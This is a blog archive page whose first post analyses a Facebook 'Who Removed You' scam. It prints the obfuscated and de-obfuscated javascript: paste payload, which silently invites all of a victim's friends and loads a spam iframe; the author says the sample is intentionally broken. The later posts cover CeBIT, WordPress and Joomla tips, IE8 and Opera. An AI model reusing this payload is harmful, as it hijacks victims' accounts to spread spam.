Author Archive

A iPhone & iPod Touch stand using a Head-Crab :3

Guess what, Facebook has another worm – the social “please help me breed” engineering kind.

Got a suggestion from a friend to a page called “Who Removed You” or “Get a free iWhatever” and clicked and found that it directs you to its summary page that asks you to copy-paste some code to your address bar. You did ?

This is as basic as social engineering goes. As you de-obfuscate the code:

javascript:var _0x8293=["\x69\x6E\x6E   ...     etc     ...   x65\x3E"];
var variables=[_0x8293[0],_0x8293[1],_0x8293[2],_0x8293[3]
,_0x8293[4],_0x8293[5],_0x8293[6],_0x8293[7],_0x8293[8],_0x8293[9],_0x8293[10],
_0x8293[11],_0x8293[12],_0x8293[13]];
void (document[variables[2]](variables[1])[variables[0]]=variables[3]);var ss=document[variables[2]](variables[4]);var c=document[variables[6]](variables[5]);c[variables[8]](variables[7],true,true);
void ss[variables[9]](c);
void setTimeout(function (){fs[variables[10]]();} ,4000);
void setTimeout(function (){SocialGraphManager[variables[13]](variables[11],variables[12]);} ,5000);
void (document[variables[2]](variables[1])[variables[0]]=_0x8293[14]);

you get something like:

document.getElementById("app1153454353453_body").innerHTML = "<a id=\"suggest\" href=\"#\" ajaxify=\"/ajax/social_graph/invite_dialog.php?class=FanManager&amp;node_id=15345435345\ class=\" profile_action actionspro_a\" rel=\"dialog-post\">Suggest to Friends</a>";
var ss=document.getElementById("suggest");
var c=document.createEvent("MouseEvents");
c.initEvent("click",true,true);
void ss.dispatchEvent(c);
void setTimeout(function (){fs.select_all();} ,4000);
void setTimeout(function (){SocialGraphManager.submitDialog("sgm_invite_form","/ajax/social_graph/invite_dialog.php");} ,5000);
void (document.getElementById("app1153454353453_body").innerHTML="<iframe src=\"http:// whodeletedyou dot blogspot.com/p/click-here-to-find-out-how-to-know-who.html\" style=\"width: 800px; height: 600px;\" frameborder=0 scrolling=\"no\"></iframe>");

Note: I intentionally broke this sample.

The code makes a “suggest to friends” popup, selects them all and sends it – you have no idea what hapened – then it sends you to another spam site – often asking you to fill out a survey.

This is the kind of thing that wont happen to most Facebook users ( as the concept of copy/paste and address bar is way beyond most people – not to mention the hand coordination one has to have to select the code ), so don’t expect this kind of thing from your Mom. (unless she just mass suggests everything by herself anyway ). /rant

As for the guy that worried who removed him so much he just had to copy+paste: Don’t worry, you wont see me go.

In related news, there is no way to report these kind of issues to Facebook.

~copy&paste

Yes, CeBIT 2010 is a event to remember with showcases of so many things coming up this year. I talked to a wordpress-deutschland.org representer (sorry didn’t catch your name) about the upcoming WordPress 3.0 and its multi-site feature.

And I got me one of the limited edition WordPress DE bags along with a nice sticker , thank you ^^

Maybe a full review of the happenings in Hanover later, as 2300km of bus travel do take the life out of a man.

Related articles by Zemanta

• What’s Coming in WordPress 3.0 (slideshare.net)
• WordPress 3.0 Wish List (techstartups.com)
• CeBIT Remainders: 8 Reasons We Didn’t Go [Remainders] (gizmodo.com)

In one particural case, you don’t want to disable WP registration but just redirect the page so some other script takes care of it. That happened to me while working on a WordPress and bbPress website. The solution is quite simple:

add_action(‘login_form_register’, ‘redirectregister’);
function redirectregister(){wp_redirect(get_option(‘siteurl’) . ‘/bb/register.php’);}

add this where wordpress will find it, in your functions file or just any plugin.

Yes, it has been a while since I updated this plugin, but the questions keep coming in — I also noticed a post by a French archive site, thanks for doing a review ;D

http://lesh.fr.nf/joomla15_test/index.php?option=com_content&view=article&id=671:screensave-020-economiseur-decran-j15&catid=6:divers&Itemid=12

This plugin is not quite what most sites want ( or would need ) but can be useful for the same thing it was made – public pc’s with a full-screen browser.

Plugin avaliable here: http://www.rawdev.net/category/joomla/screensave/

Comments, Ideas ?

Just a small update for joomkey, a language file. As I am not using this module actively I don’t have the time or the will to move it forward more.  But some people are using it.

So todays update is a dutch language file, thanks Chris

mod_joomkey.nl-NL

And once again for all the others:

• This module displays a on screen keyboard that attaches itself to all html text fields and input fields.
• To use it, you have to select one of those fields.
• You can place this module in any visible position
• It will use the local language, you may need to make a file with your locale (even if it is the same as standard English)
• As it looks at Joomla’s locale, it will work with JoomFish or similar..
• It wont work inside frames/iframes (use the firefox extension instead)
• You can make it do other stuff with the buttons (as in print whole words as in iphone’s .com button etc)

As most who use this module probably do so with a kiosk in mind, I would recommend the Firefox keyboard extension I built.

Finally got my turn to try out Jolicloud, a “cool new OS for your netbook“. I learned about it several weeks ago and it took quite a while for me to get a invite.

(more…)

Microsoft once again on the trail of mischief, as the old “get the facts” got hold of Internet Explorer 8.

http://www.microsoft.com/windows/internet-explorer/get-the-facts/browser-comparison.aspx

If you looked at that and got a head-spin, you are not the only one. First let me note the language the so called “facts” are presented in. One would expect more from the “worlds biggest software company”.  http://kilianvalkhof.com/ie8fun/ makes more sense.

Now lets talk about the lenghts MS is going to promote IE8

• First off, a connection of  videos http://www.microsoft.com/windows/internet-explorer/videos.aspx that surely cost them plenty

• Secondly, more videos promoted by several celebrities: (for free ? i think not)

  http://www.microsoft.com/windows/internet-explorer/nethistory/

• Thirdly, they are trying a pure giveaway on a pay per download to charity
  http://browserforthebetter.com

$1.15 per download to Feeding America® up to a maximum of $1,000,000

They only want to get 860k downloads ?  Firefox 3 got 8mill in 24hours http://www.spreadfirefox.com/en-US/worldrecord/ and Safary got 11 mill in 3 days http://www.apple.com/pr/library/2009/06/12safari.html.

• Hey, if they are giving away loads of money why not give it to the people, eh ? Or at least the lucky fella who will get the 10 grand promised by Microsoft today:

http://www.microsoft.com/australia/ie8/competition/default.aspx

* Hekos expects a banner with ” you just won 10,000$ ”
<Hekos> blinking and all
<Hekos> you can only see it in IE8 cause FX has a working ad/popup blocker
<Hekos> and you cant see it in <ie8 cause it crashes your system
That’s for making me stay up late to debug IE again, M$.

Hey MS what do you think about people just not caring about you ? Fact is, if they KNOW about other browsers, they are using them. If they are using them, they know you are full of sh1t. No add is going to help you. If you want people to upgrade, why not force the upgrade on them with a Update like you always do ?

httpv://www.youtube.com/watch?v=o4MwTvtyrUQ

Related Links:

http://www.geektechnica.com/2009/06/busting-ie8s-mythbusting/

http://www.webmonkey.com/blog/Taking_Microsoft_to_Task_Over_IE8__Myths_

From http://www.opera.com/freedom/ HTML source code comments:

We start our little story with the invention of the modern day computer.
Over the years, the computers grew in numbers, and the next natural step in the evolution was to connect them together. To share things.
But as these little networks grew, some computers gained more power than the rest and called themselves servers.
Today, millions of people are connected together in a great web …

Wonder what they have for us ? Check it out in 30 min
http://www.opera.com/freedom/

Edit:

Opera Unite: a Web server on the Web browser

http://unite.opera.com/

Take control of what you share online
Opera Unite allows you to easily share your data: photos, music, notes and other files. You can even run chat rooms and host entire Web sites with Opera Unite. It puts the power of a Web server in your browser, giving you greater privacy and flexibility than other online services.

Share with other Web browsers
What if you use Opera at home, and a different Web browser at work? Opera Unite services can be accessed from any modern browser, including mobile browsers! At home, just select what you want to share, and you can view it later using your work Web browser without any problems.

Integrated and extendable
Simply enable Opera Unite when you start Opera 10 beta, and you are ready to go. Find and install services with one click from our online catalog or easily create your own by using Web standards like HTML, CSS, JavaScript, SVG and AJAX.

3D Realms Gone, Took Duke Nukem Forever with them: http://www.shacknews.com/featuredarticle.x?id=1127

Not that i like to repost, but if you are like me, this story would have come as a shock to you.  Now before I go to cry under my sheets I would like to reminisce all the fun I had with the Duke Nukem series all this years.

Yes, DN 3D is the most fun game I knew back in the days. The sidescrooler also gave me some hours of play but its the idea of the game that stuck.  A character that knows no limits and a crew of developers that gave the censors something to do. Finding a game to match up to DN 3D however, is hard. No wonder they took a full 12 years, sadly giving up at the end. I hope this game will be revived. Like i was hoping for it to come out for the past 12 years.

A man can dream.